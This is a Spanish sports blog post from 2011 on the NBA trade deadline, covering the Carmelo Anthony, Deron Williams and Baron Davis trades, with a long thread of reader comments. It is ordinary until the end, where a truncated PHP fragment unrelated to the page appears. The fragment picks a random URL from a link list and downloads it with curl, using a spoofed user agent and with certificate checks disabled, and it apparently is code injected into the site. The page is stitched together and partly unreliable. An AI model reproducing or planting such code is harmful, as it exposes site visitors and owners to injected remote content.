¿El mejor ‘trade deadline’ de la historia?

24 de February de 2011 por txusma

Habría que tirar de memoria para asegurarlo pero lo que es seguro es que no muy a menudo se deben haber producido a mitad de temporada los traspasos de 4 All-Stars en 3 operaciones diferentes.

El 21 de febrero se producía el primero: Carmelo Anthony abandonaba los Nuggets de toda la vida para recalar en los Knicks después de semanas de rumores y desmentidos. Durante los días del AllStars arreciaron las negociaciones hasta la definitiva respuesta positiva de la Gran Manzana que atendía las exigencias de Denver.

Todo parecía indicar que tras el traspaso de Carmelo llegaría la calma pero nada más lejos de la realidad. Pocas horas después saltaba la bomba: Deron Williams era traspasado a los Nets a cambio de Derrick Favors, Devin Harris y 2 primeras ronda del draft. Una auténtica sorpresa incluso para el principal protagonista que no sabía absolutamente nada de una posible salida de los Jazz. Cosas muy gordas deben haber pasado en Utah para que se hayan desprendido en cosa de 2 semanas de sus 2 principales valores de los últimos años. Por su parte, los Nets se hacen con su AllStar. Se quedaron sin Carmelo pero reaccionaron rápido consiguiendo a uno de esos pocos jugadores que pueden ser llamados “jugadores franquicia”. Además parecen haberlo conseguido a un precio mucho más barato que el del ex de Syracuse pero hay que tener en cuenta que una de esas 2 primeras rondas que han traspasado es la suya propia de este mismo año, sin ningún tipo de restricción. Es decir que los Jazz se pueden encontrar con Harris, Favors y una elección entre los 3 primeros del draft. Piezas más que interesantes para dar un nuevo rumbo a la franquicia. ¿Bien vendido está Deron?

Y hoy eran traspasados otros All Stars aunque muy venidos a menos o de inferior categoría. Baron Davis y la elección de primera ronda del 2011 abandonan los Clippers para incorporarse a los Cleveland Cavaliers a cambio de Mo Williams y Jamario Moon. La clave en este traspaso parece ser puramente económica: Los Clippers se ahorran cerca de 11 millones de dólares en las 2 próximas temporadas, incorporando a un jugador que iguala o incluso supera el nivel del actual Baron Davis. A cambio han tenido que traspasar su 1ª ronda que nadie duda que será de las buenas este año así que los Cavs se hacen con su primer posible pilar de su reconstrucción.

Pero aún ha habido más traspasos:

Kirk Hinrich y Hilton Armstrong llegan a los Hawks a cambio de Mike Bibby, Maurice Evans, el rookie Jordan Crawford y una primera ronda del draft. El ex de los Wizards mejora y mucho al señor que jugaba en los Hawks disfrazado de Bibby (¿dónde quedó el de los Kings?) y supone un tímido intento de reforzarse de cara a los Playoffs. De todas maneras siguen quedándose a años luz de Celtics, Heat, Magic e incluso Knicks pero lo bonito es intentarlo.

– New Orleans y Sacramento Kings han intercambiado los cromos de Marcus Thorton y Carl Landry respectivamente. El fichaje de Carl Landry me parece muy bueno para los Hornets que añaden un buen jugador a su pobre juego interior. Marcus Thorton demostró el año pasado que tiene cosas muy interesantes que ofrecer, sobretodo en lo que respecta al aspecto anotador. Los problemas de lesiones de Tyreke Evans le darán la oportunidad de jugar desde ya mismo y cuando la estrella de Sacramento este recuperada puede formar un duo letal en determinados momentos del partido. Con este movimiento los Kings se han quedado por debajo del  mínimo salarial que ha de tener una plantilla (¡Sí! ¡También hay mínimo!) así que tendrán que gastarse aproximadamente 1 millón de dólares en fichar un par de jugadores aunque sea para agitar las toallas.

– Otro que llevaba meses sonando en todos los rumores (sobretodo en los que involucraban a Carmelo) era Troy Murphy. Finalmente sale traspasado a los Golden State Warrios a cambio de Dan Gadzuric y Brandan Wright. Observado el infame juego interior que les queda a los Nets nadie duda de que disputarán minutos pero si jugáis una liga fantástica y aún podéis fichar jugadores lanzaos a por Kris Humphries. Tiene pinta de jugar 35 minutos todas las noches. Lo mejor del tema es que los GS le harán un buyout al contrato de Murphy así que lo realmente interesante es saber porqué equipo fichará el jugador. Boston, Orlando, Miami, Dallas e incluso New York ya estan posicionados. Se trataría de un pedazo de refuerzo.

Kosta Koufos ha llegado también a los Nuggets en medio de la vorágine del traspaso de Carmelo. Ya podéis comprar su camiseta. Y James Johnson, la elección de 1ª ronda de 2009 de los Bulls, ha sido traspasado a los Raptors.

Todavía quedan unas 5-6 horas para que se acabe el plazo de traspasos y hay bastantes frentes abiertos: Los Bulls siguen a la caza de un buen escolta (¿Courtney Lee?); los Blazers siguen tras Gerald Wallace pero las cosas parecen haberse enfriado; Dallas podría incorporar a Tayshaun Prince, JR Smith o ambos; Battier podría volver a Memphis a cambio de Hasheem Thabeet.

Seguiremos informando. ¡Atentos al twitter!

Comenta

27 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Me ofrezco voluntario para agitar toallas en Sacramento!!!

      Citar

  2. TheDeerHunter dice:
    #2

    Puntualizando te olvidas de otros dos ex-all star, además de los mencionados: Billups y Bibby

      Citar

  3. scriers dice:
    #3

    Pues resulta que Deron ha conocido las dos facetas de la liga superprofesional. Como es profesional y muy bueno, pues quiere lo mejor deportivamente, ganar anillos y ser competitivo, por eso discutió con Sloan y no se encontraba cómodo con la franquicia y por eso se hablaba de Deron descontento. Es lógico querer avanzar para un profesional. Pero también es lógico que la franquicia juegue cartas en el asunto, y si ya te ven descontento y encima discutes con un emblema, pues te envasan y te vas para otro sitio. Eso también es megaprofesional para la franquicia.

    Así que por una parte son los jugadores los que mandan y por otra parte son las franquicias. Todo muy megaprofesional y lleno de intereses. Vale. Entonces, por eso, cada vez tiene más sentido gente que se quiere quedar siempre en el mismo equipo o que tienen lazos con la franquicia o que son coetáneos del lugar. Y eso pasa porque escasea ante tanto megaprofesional. Por eso se valora, aunque sea luego una mentira para creerte diferente.

      Citar

  4. Len Bias dice:
    #4

    Y Devin Harris también es All-Star

    Los Knicks salen muy bien parados de todo esto, sobre todo en ánimo e ilusión, y los Clippers (aunque esa primera ronda tiene pinta de ser buena) tampoco se pueden quejar.

      Citar

  5. Denise dice:
    #5

    Y Baron Davis también es All-Star….XD
    Yo creo que Txusma se refiere a all-star de este año, no le busqueis las tres piernas al hombre:)

      Citar

  6. TheDeerHunter dice:
    #6

    ¿y quienes son los 4 entonces?

      Citar

  7. Txusma dice:
    #7

    Dejadme en paz!! 😀

    Me había olvidado de Billups y Harris pero Bibby no es All-Stars. De hecho, en un principio había contado los 3 principales (Anthony, Deron, Davis) pero luego pensé en incluir al resto y ahí me despisté pq sólo me quedé con Mo Williams.

    Es lo que tiene ir contrareloj. Esto del trade deadline es de locos!

      Citar

  8. sergio dice:
    #8

    La elección de Clipspers ahora mismo es un 8 del draft. A mi la apuesta d los Nets solo m parece positiva xa atraer otros agentes libres. Que jugadores compatibles con Deron hay n la clase del 2011?

      Citar

  9. Txusma dice:
    #9

    Los buenos, buenos (Chris Paul, Dwight Howard, el mismo Deron) salen en 2012 junto la clase del 2008 que es de las buenas, buenas (Rose, Love, Westbrook, Lopez, Gallinari, etc…)
    En 2011, sale gente como Tim Duncan, Jamal Crawford, Zach Randolph o David West. este último parece interesante pero el juego interior West-Lopez cogería menos rebotes que un par de nostros en una pachanga.

      Citar

  10. miquel dice:
    #10

    elecciones del draft del numero ocho qe me vienen a la cabeza son como tj ford jamal crawford chris wilcox desagna diop karry kittels la mayoria menos crawford no son muy buenas i si es un darius miles tratondose de los clipers aunqe cama y griffin no estan mal regular cambio para mi

      Citar

  11. Txusma dice:
    #11

    Madre mía! Me encanta este día.

    Se suceden las noticias: Perkins y Nate a OKC a cambio de Jeff Green y Krstic. Battier a Memphis a cambio de Thabeet y una 1ª ronda. habrá que ver cómo se completan los traspasos

      Citar

  12. MagicJohnson32 dice:
    #12

    Antawn Jamison podría volver a GS.

      Citar

  13. Txusma dice:
    #13

    OKC se hace tb con Mohameed! Se han hecho con un par de 5 de los duros, duros…

      Citar

  14. Hynreck dice:
    #14

    Lop de OKC significa que confían en Ibaka como 4 titular para el futuro.

      Citar

  15. MagicJohnson32 dice:
    #15

    Portland will send Joel Przybilla and a 2nd round draft pick to Charlotte for Gerald Wallace

    wow!

      Citar

  16. Hynreck dice:
    #16

    Pero que mierda de reconstrucciones hace Jordan???
    Mohammed y Gerald Wallce (El Bobcat original) por DJ White, Przybilla y Mo Peterson?????

    Me callo lo que pienso

      Citar

  17. MagicJohnson32 dice:
    #17

    Aaron Brooks a Suns

      Citar

  18. MagicJohnson32 dice:
    #18

    O.J. Mayo a Pacers por McRoberts y 1ª

      Citar

  19. Denise dice:
    #19

    Excuse me txusma! no había leido que Baron Davis ya lo habías puesto tú.
    Pues no me esperaba yo que los Celtics dejasen ir a Perkins. Jeff Green me parece un buen suplente, pero el puesto de 4 ya lo tienen más que cubierto con Garnett, Glen Davis y el propio Green. Para mi, un craso error del GM, Krstic me parece muy blandito para defender a un tal Howard en una hipotetica serie BOS-ORL , a no ser que antes del partido se lo cargue tirandole una silla en la cabeza como la que le tiró a Boroussis

      Citar

  20. Txusma dice:
    #20

    Los Celtics tb hasn traspasado a Erden y haragondy a los Cavs por una 2ª ronda…

    Lo de Mayo y Brook está confirmado?

      Citar

  21. Hynreck dice:
    #21

    Lo de Mayo no lo he visto, lo de Brooks a los Suns sí, a cambio de Dragic

      Citar

  22. CAMPO2 dice:
    #22

    Lo de Mayo dicen que fuera de plazo y no vale

      Citar

  23. Busky23 dice:
    #23

    Madre mía…entro al blog a ver si había habido algún movimiento y me encuentro con todo esto ?,ya veo que no soy el único que deja todo para ultima hora.

    Me alegro por los Thunder,reforzando con 2 rocas su juego interior,ya era hora de que largaran a Jeff “poca sangre” Green.

    Venga,que aunque sea menor vamos con el ultimoLos Celtics envían al pívot turco Semih Erden y a Luke Harangody a los Cleveland Cavaliers, a cambio de una futura 2ª ronda del Draft.

      Citar

  24. MagicJohnson32 dice:
    #24

    ¿¿Qué ha hecho Ainge??

      Citar

  25. Denise dice:
    #25

    Yo creo que Jordan quiere batir un record y pasar a la historia como el mejor jugador de baloncesto de la historia y el peor general manager de la historia.

      Citar

  26. TheDeerHunter dice:
    #26

    Pues ante ese hito otra vez que se cruza en su camino un Bad Boy: Isiah

      Citar

  27. Txusma dice:
    #27

    Como digo en el otro post: Jordan no es GM

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>